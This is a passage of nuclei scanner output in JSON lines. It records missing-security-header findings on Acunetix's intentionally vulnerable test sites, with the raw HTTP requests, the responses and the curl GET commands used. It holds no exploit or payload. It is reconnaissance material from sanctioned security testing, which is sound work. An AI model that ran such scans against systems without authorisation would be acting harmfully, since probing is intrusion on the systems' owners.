ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:44.980266482Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:44.980378218Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:44.980432831Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle 